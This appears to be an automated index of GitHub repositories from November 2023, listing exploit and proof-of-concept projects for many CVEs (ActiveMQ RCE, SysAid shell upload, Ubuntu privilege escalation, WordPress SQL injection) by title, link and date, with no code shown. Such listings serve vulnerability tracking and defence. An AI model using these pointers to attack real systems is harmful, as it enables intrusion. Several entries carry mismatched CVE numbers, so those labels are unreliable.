**no description** : [tucommenceapousser/CVE-2023-47246](https://github.com/tucommenceapousser/CVE-2023-47246) create time: 2023-11-22T08:18:11Z

**exploit for cve-2023-47246 SysAid RCE (shell upload)** : [rainbowhatrkn/CVE-2023-47246](https://github.com/rainbowhatrkn/CVE-2023-47246) create time: 2023-11-22T08:13:51Z

**no description** : [vert16x/CVE-2023-32571-POC](https://github.com/vert16x/CVE-2023-32571-POC) create time: 2023-11-18T06:12:12Z

**no description** : [rothilion26/cve2023-data](https://github.com/rothilion26/cve2023-data) create time: 2023-11-21T18:16:34Z

**Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs** : [felixslama/log4shell-minecraft-demo](https://github.com/felixslama/log4shell-minecraft-demo) create time: 2023-11-21T15:45:31Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911) create time: 2023-11-21T13:05:00Z

**no description** : [Iris288/CVE-2021-43798](https://github.com/Iris288/CVE-2021-43798) create time: 2023-11-21T11:24:54Z

**no description** : [nidhi7598/linux-4.19.72_net_CVE-2023-4622](https://github.com/nidhi7598/linux-4.19.72_net_CVE-2023-4622) create time: 2023-11-21T11:53:18Z

**no description** : [passwa11/CVE-2023-4357-APT-Style-exploitation](https://github.com/passwa11/CVE-2023-4357-APT-Style-exploitation) create time: 2023-11-21T05:39:15Z

**no description** : [zer0ne1/CVE-2022-0337-RePoC](https://github.com/zer0ne1/CVE-2022-0337-RePoC) create time: 2023-11-21T02:34:32Z

**no description** : [Yasan-Ransika/CVE-Exploit---2011-2523](https://github.com/Yasan-Ransika/CVE-Exploit---2011-2523) create time: 2023-11-21T02:24:12Z

**CVE-2017-8917 SQL injection Vulnerability in Joomla! 3.7.0 exploit** : [BaptisteContreras/CVE-2017-8917-Joomla](https://github.com/BaptisteContreras/CVE-2017-8917-Joomla) create time: 2023-11-20T19:50:57Z

**no description** : [b3pwn3d/CVE-2017-7921](https://github.com/b3pwn3d/CVE-2017-7921) create time: 2023-11-20T18:44:13Z

**EWWW Image Optimizer <= 7.2.0 - Unauthenticated Sensitive Information Exposure via Debug Log** : [RandomRobbieBF/CVE-2023-40600](https://github.com/RandomRobbieBF/CVE-2023-40600) create time: 2023-11-20T19:05:50Z

**CVE_2023_22518_Checker** : [0x00sector/CVE_2023_22518_Checker](https://github.com/0x00sector/CVE_2023_22518_Checker) create time: 2023-11-20T18:58:54Z

**Learn more things, not suck all things** : [tiyeume25112004/CVE-2023-1177-rebuild](https://github.com/tiyeume25112004/CVE-2023-1177-rebuild) create time: 2023-11-20T18:32:46Z

**Scripts to get infos** : [s-bt/CVE-2023-4966](https://github.com/s-bt/CVE-2023-4966) create time: 2023-11-20T17:32:16Z

**Weak encryption in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject wireless arbitrary keystrokes.** : [aprkr/CVE-2023-48034](https://github.com/aprkr/CVE-2023-48034) create time: 2023-11-20T16:04:24Z

**no description** : [Kamiya767/CVE-2019-2725](https://github.com/Kamiya767/CVE-2019-2725) create time: 2023-11-20T14:08:07Z

**Improved code of Daniele Scanu SQL Injection exploit** : [byrek/CVE-2019-9053](https://github.com/byrek/CVE-2019-9053) create time: 2023-11-20T12:02:59Z

**no description** : [nitzanoligo/CVE-2023-46604-demo](https://github.com/nitzanoligo/CVE-2023-46604-demo) create time: 2023-11-20T11:57:24Z

**no description** : [Iris288/CVE-2021-41773](https://github.com/Iris288/CVE-2021-41773) create time: 2023-11-20T09:57:07Z

**My team research about CVE-2018-17924 of Rockwell Automation Micrologix 1400** : [g0dd0ghd/CVE-2018-17924](https://github.com/g0dd0ghd/CVE-2018-17924) create time: 2023-11-09T15:44:45Z

**Mitigated version for CVE-2016-1000027 spring web.** : [tina94happy/Spring-Web-5xx-Mitigated-version](https://github.com/tina94happy/Spring-Web-5xx-Mitigated-version) create time: 2023-11-20T02:02:10Z

**Polkit提权包 CVE-2021-4034 (供需要的人方便使用** : [Part01-Pai/Polkit-Permission-promotion-compiled](https://github.com/Part01-Pai/Polkit-Permission-promotion-compiled) create time: 2023-11-20T03:24:05Z

**PY** : [minhangxiaohui/ActiveMQ_CVE-2023-46604](https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604) create time: 2023-11-20T02:24:47Z

**Apt style exploitation of Chrome 0day CVE-2023-4357** : [OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation](https://github.com/OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation) create time: 2023-11-19T22:20:10Z

**WPS PIN Offline Brute Force Cracking Vulnerability in Huawei Home Gateway Products** : [ForceFledgling/CVE-2014-9690](https://github.com/ForceFledgling/CVE-2014-9690) create time: 2023-11-19T16:34:25Z

**A POC of a type confusion bug in chakracore framework that leads to code execute.** : [NatteeSetobol/Chakra-CVE-2019-0567](https://github.com/NatteeSetobol/Chakra-CVE-2019-0567) create time: 2023-11-19T07:58:34Z

**no description** : [rhymsc/CVE-2022-44877-RCE](https://github.com/rhymsc/CVE-2022-44877-RCE) create time: 2023-11-18T21:53:54Z

**no description** : [NKeshawarz/CVE-2023-46604-RCE](https://github.com/NKeshawarz/CVE-2023-46604-RCE) create time: 2023-11-18T12:51:03Z

**no description** : [Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338) create time: 2023-11-18T12:02:22Z

**no description** : [nitipoom-jar/CVE-2023-47102](https://github.com/nitipoom-jar/CVE-2023-47102) create time: 2023-11-18T10:52:40Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338) create time: 2023-11-18T07:44:41Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109) create time: 2023-11-18T07:56:12Z

**no description** : [Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_](https://github.com/Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_) create time: 2023-11-18T07:50:57Z

**no description** : [wshinkle/CVE-2023-2982](https://github.com/wshinkle/CVE-2023-2982) create time: 2023-11-18T06:34:15Z

**no description** : [Tris0n/CVE-2023-32571-POC](https://github.com/Tris0n/CVE-2023-32571-POC) create time: 2023-11-18T04:35:37Z

**This code functionally approximates the Citrix Bleed vulnerability (CVE-2023-4699).** : [Scottzxor/Citrix-Bleed-Buffer-Overread-Demo](https://github.com/Scottzxor/Citrix-Bleed-Buffer-Overread-Demo) create time: 2023-11-17T19:55:30Z

**no description** : [ka7ana/CVE-2023-36025](https://github.com/ka7ana/CVE-2023-36025) create time: 2023-11-17T15:46:44Z

**LPE PoC of a vulnerability in the io_uring subsystem of the Linux Kernel.** : [ysanatomic/io_uring_LPE-CVE-2023-2598](https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598) create time: 2023-11-16T23:41:27Z

**Chrome任意文件读取漏洞POC** : [xcanwin/CVE-2023-4357-Chrome-LFI](https://github.com/xcanwin/CVE-2023-4357-Chrome-LFI) create time: 2023-11-17T10:32:31Z

**no description** : [nidhi7598/packages_apps_EmergencyInfo_AOSP_10_r33_CVE-2023-20932](https://github.com/nidhi7598/packages_apps_EmergencyInfo_AOSP_10_r33_CVE-2023-20932) create time: 2023-11-17T09:23:28Z

**Authentication Bypass Vulnerability in Mind Server.** : [fbkcs/CVE-2020-24765](https://github.com/fbkcs/CVE-2020-24765) create time: 2023-11-17T08:43:14Z

**Path Traversal Vulnerability in Systematica SMTP Adapter and other sub-products** : [fbkcs/CVE-2021-35975](https://github.com/fbkcs/CVE-2021-35975) create time: 2023-11-17T08:47:20Z

**exploit for cve-2023-46747 (shell upload)** : [W01fh4cker/CVE-2023-47246-EXP](https://github.com/W01fh4cker/CVE-2023-47246-EXP) create time: 2023-11-17T07:03:06Z

**CVE-2023-44796** : [Hebing123/CVE-2023-44796](https://github.com/Hebing123/CVE-2023-44796) create time: 2023-11-17T06:50:16Z

**CVE-2023-54436 Exp** : [NHPT/CVE-2023-48123](https://github.com/NHPT/CVE-2023-48123) create time: 2023-11-17T02:56:26Z

**By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.** : [gmh5225/CVE-2003-0358](https://github.com/gmh5225/CVE-2003-0358) create time: 2022-12-17T13:11:00Z

**SynixCyberCrimeMY CVE-2023-29489 Scanner By SamuraiMelayu1337 & h4zzzzzz@scc** : [SynixCyberCrimeMy/CVE-2023-29489](https://github.com/SynixCyberCrimeMy/CVE-2023-29489) create time: 2023-11-16T20:24:11Z

**no description** : [nitipoom-jar/CVE-2023-48028](https://github.com/nitipoom-jar/CVE-2023-48028) create time: 2023-11-16T19:22:30Z

**no description** : [nitipoom-jar/CVE-2023-48029](https://github.com/nitipoom-jar/CVE-2023-48029) create time: 2023-11-16T18:42:12Z

**SynixCyberCrimeMY CVE Exploiter By SamuraiMelayu1337 & ?/h4zzzzzz.scc** : [SynixCyberCrimeMy/CVE-2022-29464](https://github.com/SynixCyberCrimeMy/CVE-2022-29464) create time: 2023-11-16T18:16:29Z

**no description** : [nitipoom-jar/CVE-2023-48031](https://github.com/nitipoom-jar/CVE-2023-48031) create time: 2023-11-16T17:57:20Z

**CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)** : [thesafdari/CVE-2023-6063](https://github.com/thesafdari/CVE-2023-6063) create time: 2023-11-16T17:41:59Z

**CVE-2023-20198 Exploit PoC** : [smokeintheshell/CVE-2023-20198](https://github.com/smokeintheshell/CVE-2023-20198) create time: 2023-11-16T16:39:38Z

**Exploiting SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)** : [hackersroot/CVE-2023-6063-PoC](https://github.com/hackersroot/CVE-2023-6063-PoC) create time: 2023-11-16T16:36:44Z

**POC for cve 2023 41320 GLPI** : [Guilhem7/CVE_2023_41320](https://github.com/Guilhem7/CVE_2023_41320) create time: 2023-11-16T16:21:51Z

**A demo of the Log4Shell (CVE-2021-44228) vulnerability.** : [roshanshibu/Odysseus](https://github.com/roshanshibu/Odysseus) create time: 2023-10-25T19:27:00Z

**no description** : [hshivhare67/Jetty_v9.4.31_CVE-2020-27223](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223) create time: 2023-11-16T06:29:09Z

**no description** : [hshivhare67/Jetty_v9.4.31_CVE-2021-28165](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2021-28165) create time: 2023-11-16T07:15:37Z

**no description** : [hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch) create time: 2023-11-16T06:20:35Z

**CVE-2023-46604环境复现包** : [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence) create time: 2023-11-16T02:36:07Z

**no description** : [LUCASRENAA/CVE-2018-25031](https://github.com/LUCASRENAA/CVE-2018-25031) create time: 2023-11-16T00:29:31Z

**PoC for CVE-2023-39539 in Cacti 1.2.22** : [AdamWen230/CVE-2023-39539-PoC](https://github.com/AdamWen230/CVE-2023-39539-PoC) create time: 2023-11-15T21:39:54Z

**Working in Progress POC for CVE2021-38297** : [gkrishnan724/CVE-2021-38297](https://github.com/gkrishnan724/CVE-2021-38297) create time: 2023-11-15T20:52:36Z

**Highly configurable tool to check a server's vulnerability against CVE-2023-44487 by rapidly sending HEADERS and RST_STREAM frames and documenting the server's responses.** : [ndrscodes/http2-rst-stream-attacker](https://github.com/ndrscodes/http2-rst-stream-attacker) create time: 2023-11-08T20:56:22Z

**no description** : [S4muraiMelayu1337/CVE-2022-29469](https://github.com/S4muraiMelayu1337/CVE-2022-29469) create time: 2023-11-15T18:47:44Z

**POC repo for CVE-2023-46604** : [vjayant93/CVE-2023-46604-POC](https://github.com/vjayant93/CVE-2023-46604-POC) create time: 2023-11-15T19:11:01Z

**no description** : [gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite](https://github.com/gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite) create time: 2023-11-15T18:21:20Z

**no description** : [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488) create time: 2023-11-15T16:32:01Z

**no description** : [RSA-Demo/cve-2022-42889-text4shell](https://github.com/RSA-Demo/cve-2022-42889-text4shell) create time: 2023-04-21T08:15:19Z

**no description** : [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489) create time: 2023-11-15T16:07:02Z

**no description** : [rubbxalc/CVE-2023-1521](https://github.com/rubbxalc/CVE-2023-1521) create time: 2023-11-15T15:31:44Z

**CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)** : [motikan2010/CVE-2023-6063-PoC](https://github.com/motikan2010/CVE-2023-6063-PoC) create time: 2023-11-15T14:53:03Z

**CVE-2023-54436** : [NHPT/CVE-2023-54436](https://github.com/NHPT/CVE-2023-54436) create time: 2023-11-15T13:54:56Z

**WinRAR-6.22、CVE-2023-38831、CNNVD-202308-1943、DM-202307-003730、QVD-2023-19572漏洞复现** : [xk-mt/winrar-Vulnerability-recurrence-tutorial](https://github.com/xk-mt/winrar-Vulnerability-recurrence-tutorial) create time: 2023-11-15T07:01:05Z

**no description** : [turnernator1/Node.js-CVE-2017-5941](https://github.com/turnernator1/Node.js-CVE-2017-5941) create time: 2023-03-30T06:39:25Z

**Report and exploit of CVE-2023-36427** : [tandasat/CVE-2023-36427](https://github.com/tandasat/CVE-2023-36427) create time: 2023-10-09T16:55:18Z

**Python exploit written for CVE-2019-1010268.** : [Tonyynot14/CVE-2019-1010268](https://github.com/Tonyynot14/CVE-2019-1010268) create time: 2023-11-14T21:50:51Z

**no description** : [NataliSemi/-CVE-2022-44268](https://github.com/NataliSemi/-CVE-2022-44268) create time: 2023-11-14T21:54:17Z

**DoS vulnerability in AMD driver that corrupts the display.** : [whypet/CVE-2023-31320](https://github.com/whypet/CVE-2023-31320) create time: 2023-08-22T21:15:46Z

**no description** : [gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal](https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal) create time: 2023-11-14T20:45:31Z

**no description** : [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489) create time: 2023-11-05T12:02:11Z

**no description** : [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488) create time: 2023-11-04T21:42:16Z

**no description** : [nitipoom-jar/CVE-2023-48200](https://github.com/nitipoom-jar/CVE-2023-48200) create time: 2023-11-14T17:02:07Z

**no description** : [nitipoom-jar/CVE-2023-48199](https://github.com/nitipoom-jar/CVE-2023-48199) create time: 2023-11-14T16:50:31Z

**no description** : [nitipoom-jar/CVE-2023-48198](https://github.com/nitipoom-jar/CVE-2023-48198) create time: 2023-11-14T16:40:03Z

**Ansible Playbook for CVE-2023-36845** : [ditekshen/ansible-cve-2023-36845](https://github.com/ditekshen/ansible-cve-2023-36845) create time: 2023-11-14T16:36:29Z

**no description** : [nitipoom-jar/CVE-2023-48197](https://github.com/nitipoom-jar/CVE-2023-48197) create time: 2023-11-14T16:34:21Z

**no description** : [hshivhare67/Jetty-v9.4.31_CVE-2023-26049_new](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26049_new) create time: 2023-11-14T10:56:47Z

**no description** : [hshivhare67/Jetty-v9.4.31_CVE-2023-26049](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26049) create time: 2023-11-14T10:45:23Z

**no description** : [Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338](https://github.com/Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338) create time: 2023-11-14T09:21:58Z

**Restrict Content <= 3.2.7 - Information Exposure via legacy log file** : [RandomRobbieBF/CVE-2023-47668](https://github.com/RandomRobbieBF/CVE-2023-47668) create time: 2023-11-14T08:40:49Z

**CVE-2023-32629 & CVE-2023-2640 Ubuntu Privilege Escalation POC** : [Umutkgz/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC](https://github.com/Umutkgz/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC) create time: 2023-11-14T08:37:45Z

**no description** : [ex0day/CVE-2023-47246](https://github.com/ex0day/CVE-2023-47246) create time: 2023-11-14T08:13:43Z

**no description** : [emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS](https://github.com/emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS) create time: 2023-11-14T08:08:08Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21097](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-21097) create time: 2023-11-14T05:02:59Z

**A improved POC exploit based on the reported CVE on exploitdb** : [9xN/CVE-2023-32707](https://github.com/9xN/CVE-2023-32707) create time: 2023-11-14T04:06:08Z

**no description** : [martinvks/CVE-2022-45059-poc](https://github.com/martinvks/CVE-2022-45059-poc) create time: 2023-11-12T10:51:54Z

**no description** : [pedrojosenavasperez/cve-2023-5965](https://github.com/pedrojosenavasperez/cve-2023-5965) create time: 2022-10-20T15:35:07Z

**no description** : [pedrojosenavasperez/cve-2023-5966](https://github.com/pedrojosenavasperez/cve-2023-5966) create time: 2022-10-20T13:00:10Z

**Log4j Vulnerability RCE - CVE-2021-44228** : [LucasPDiniz/CVE-2021-44228](https://github.com/LucasPDiniz/CVE-2021-44228) create time: 2023-11-13T16:57:22Z

**no description** : [MrR0b0t19/CVE-2023-41064](https://github.com/MrR0b0t19/CVE-2023-41064) create time: 2023-11-13T17:07:02Z

**CVE-2022-24227 [Updated]: BoltWire v8.00 vulnerable to "Stored Cross-site Scripting (XSS)"** : [Cyber-Wo0dy/CVE-2022-24227-updated](https://github.com/Cyber-Wo0dy/CVE-2022-24227-updated) create time: 2023-11-13T12:53:56Z

**CVE-2023-5360 Exploit/POC** : [1337r0j4n/CVE-2023-5360](https://github.com/1337r0j4n/CVE-2023-5360) create time: 2023-11-13T12:51:34Z

**Statamic CMS versions <4.33.0 vulnerable to "Remote Code Execution"** : [Cyber-Wo0dy/CVE-2023-47129](https://github.com/Cyber-Wo0dy/CVE-2023-47129) create time: 2023-11-13T12:21:52Z

**Cloud Templates & Patterns collection <= 1.2.2 - Sensitive Information Exposure via Log File** : [RandomRobbieBF/CVE-2023-47529](https://github.com/RandomRobbieBF/CVE-2023-47529) create time: 2023-11-13T10:50:25Z

**Обнаружение эксплойта CVE-2023-28252** : [Danasuley/CVE-2023-28252-](https://github.com/Danasuley/CVE-2023-28252-) create time: 2023-11-13T07:46:38Z

**CVE-2023-46604环境复现包** : [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence) create time: 2023-11-13T02:37:12Z

**A POC for CVE-2023-47119** : [BaadMaro/CVE-2023-47119](https://github.com/BaadMaro/CVE-2023-47119) create time: 2023-11-12T23:34:07Z

**Spring4Shell Vulnerability RCE - CVE-2022-22965** : [LucasPDiniz/CVE-2022-22965](https://github.com/LucasPDiniz/CVE-2022-22965) create time: 2023-11-12T22:15:32Z

**This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.** : [duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell) create time: 2023-11-12T11:26:46Z

**Implementações de servidores HTML em GO para análise da vulnerabilidade CVE-2023-29406.** : [LuizGustavoP/EP3_Redes](https://github.com/LuizGustavoP/EP3_Redes) create time: 2023-11-11T16:28:22Z

**One-Liner CVE-2023-32629/CVE-2023-2640 Ubuntu Privilege Escalation** : [k4but0/Ubuntu-LPE](https://github.com/k4but0/Ubuntu-LPE) create time: 2023-11-11T14:33:38Z

**A simple exploit for CVE-2019-2725.** : [CalegariMindSec/Exploit-CVE-2019-2725](https://github.com/CalegariMindSec/Exploit-CVE-2019-2725) create time: 2023-11-11T13:27:39Z

**CVE-2023-42468** : [actuator/com.cutestudio.colordialer](https://github.com/actuator/com.cutestudio.colordialer) create time: 2023-09-02T14:48:07Z

**no description** : [ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability) create time: 2023-11-11T10:54:25Z

**no description** : [ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) create time: 2023-11-11T09:14:56Z

**no description** : [ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability) create time: 2023-11-11T08:37:57Z

**no description** : [ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) create time: 2023-11-11T08:23:30Z

**no description** : [ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) create time: 2023-11-11T07:37:57Z

**no description** : [ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) create time: 2023-11-10T20:46:29Z

**no description** : [ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) create time: 2023-11-10T20:24:40Z

**no description** : [ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) create time: 2023-11-10T19:40:49Z

**no description** : [ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) create time: 2023-11-10T17:40:37Z

**some POCs for CVE-2021-32682** : [nickswink/CVE-2021-32682](https://github.com/nickswink/CVE-2021-32682) create time: 2023-11-10T16:16:47Z

**no description** : [aleksey-vi/CVE-2023-47460](https://github.com/aleksey-vi/CVE-2023-47460) create time: 2023-11-10T15:38:01Z

**no description** : [aleksey-vi/CVE-2023-47459](https://github.com/aleksey-vi/CVE-2023-47459) create time: 2023-11-10T15:20:48Z

**Ansible Playbook for CVE-2023-22518** : [ditekshen/ansible-cve-2023-22518](https://github.com/ditekshen/ansible-cve-2023-22518) create time: 2023-11-10T10:59:09Z

**CVE-2023-32031 MS Exchange PowerShell backend RCE** : [Avento/CVE-2023-32031](https://github.com/Avento/CVE-2023-32031) create time: 2023-11-10T09:32:27Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2016-0705](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2016-0705) create time: 2023-11-10T08:40:56Z

**Examples for Implementing cve-2023-44487 ( HTTP/2 Rapid Reset Attack ) Concept** : [nxenon/cve-2023-44487](https://github.com/nxenon/cve-2023-44487) create time: 2023-11-10T08:38:51Z

**exp** : [adminxb/CVE-2023-34039](https://github.com/adminxb/CVE-2023-34039) create time: 2023-11-10T07:23:11Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2014-3507](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2014-3507) create time: 2023-11-10T07:14:42Z

**no description** : [bilalk88/CVE-2018-6574](https://github.com/bilalk88/CVE-2018-6574) create time: 2023-11-10T06:44:43Z

**CVE-2023-24706** : [hatjwe/CVE-2023-24706](https://github.com/hatjwe/CVE-2023-24706) create time: 2023-11-10T05:43:52Z

**CVE-2017-75 - Check and EXPLOIT** : [CalebFIN/EXP-CVE-2017-75](https://github.com/CalebFIN/EXP-CVE-2017-75) create time: 2023-11-09T17:13:30Z

**Exploit for Webmin servers versions 1.890 through 1.920.** : [aamfrk/Webmin-CVE2019-15107](https://github.com/aamfrk/Webmin-CVE2019-15107) create time: 2023-11-09T12:19:09Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2016-0702](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2016-0702) create time: 2023-11-09T13:10:12Z

**Code to detect/exploit vulnerable metabase application** : [j0yb0y0h/CVE-2023-38646](https://github.com/j0yb0y0h/CVE-2023-38646) create time: 2023-11-09T13:13:25Z

**配合 CVE-2023-22515 后台上传jar包实现RCE** : [aaaademo/Confluence-EvilJar](https://github.com/aaaademo/Confluence-EvilJar) create time: 2023-11-09T12:55:25Z

**no description** : [olingo99/CVE-2019-15107](https://github.com/olingo99/CVE-2019-15107) create time: 2023-11-09T12:14:11Z

**CVE-2022-32250-LPE** : [Decstor5/2022-32250LPE](https://github.com/Decstor5/2022-32250LPE) create time: 2023-11-09T12:27:26Z

**no description** : [h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up](https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up) create time: 2023-11-09T11:27:20Z

**Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629 & CVE-2023-2640** : [ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation](https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation) create time: 2023-11-09T09:19:23Z

**CVE-2023-22518 Exploit** : [0x0d3ad/CVE-2023-22518](https://github.com/0x0d3ad/CVE-2023-22518) create time: 2023-11-09T06:56:18Z

**no description** : [uthrasri/G2.5_openssl_CVE-2014-5139](https://github.com/uthrasri/G2.5_openssl_CVE-2014-5139) create time: 2023-11-09T05:18:20Z

**CVE-2018-6574: go get RCE** : [Ashved9/Orange](https://github.com/Ashved9/Orange) create time: 2023-11-09T06:11:58Z

**Takeover of Oracle WebLogic Server** : [LucasPDiniz/CVE-2020-14882](https://github.com/LucasPDiniz/CVE-2020-14882) create time: 2023-11-09T04:31:26Z

**Takeover Account OpenSSH** : [LucasPDiniz/CVE-2023-38408](https://github.com/LucasPDiniz/CVE-2023-38408) create time: 2023-11-09T04:34:39Z

**cve-2019-9978 PoC** : [0xMoonrise/cve-2019-9978](https://github.com/0xMoonrise/cve-2019-9978) create time: 2023-11-09T03:01:02Z

**no description** : [K1i7n/CVE-2023-34048-findings](https://github.com/K1i7n/CVE-2023-34048-findings) create time: 2023-11-08T17:31:55Z

**RemoteClinic 2.0 contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell.** : [amirhosseinbahramizadeh/CVE-2023-33480](https://github.com/amirhosseinbahramizadeh/CVE-2023-33480) create time: 2023-11-08T17:14:53Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2015-3196](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2015-3196) create time: 2023-11-08T11:03:10Z

**Looney Tunables CVE-2023-4911** : [teraGL/looneyCVE](https://github.com/teraGL/looneyCVE) create time: 2023-11-08T09:34:04Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1791](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1791) create time: 2023-11-08T07:28:11Z

**CVE-2023-46604 Apache ActiveMQ RCE exp 基于python** : [justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp](https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp) create time: 2023-11-08T07:48:00Z

**This Python script is designed to exploit a security vulnerability in Bitrix24, leading to a Denial of Service (DoS) attack. The vulnerability, identified as CVE-2023-1718, allows an attacker to disrupt the normal operation of a Bitrix24 instance.** : [jhonnybonny/Bitrix24DoS](https://github.com/jhonnybonny/Bitrix24DoS) create time: 2023-11-08T07:45:54Z

**no description** : [CN016/Nuxeo-CVE-2018-16341](https://github.com/CN016/Nuxeo-CVE-2018-16341) create time: 2023-11-08T06:08:42Z

**Server Broken Access Control in Confluence - CVE-2023-22515** : [LucasPDiniz/CVE-2023-22515](https://github.com/LucasPDiniz/CVE-2023-22515) create time: 2023-11-08T05:18:30Z

**Exploiting vulnerability in Polkit** : [LucasPDiniz/CVE-2021-3560](https://github.com/LucasPDiniz/CVE-2021-3560) create time: 2023-11-08T05:11:56Z

**Juniper Junos exploit for CVE-2023-36844 (or CVE-2023-36845)** : [realcitril/CVE-2023-36844](https://github.com/realcitril/CVE-2023-36844) create time: 2023-11-07T19:35:51Z

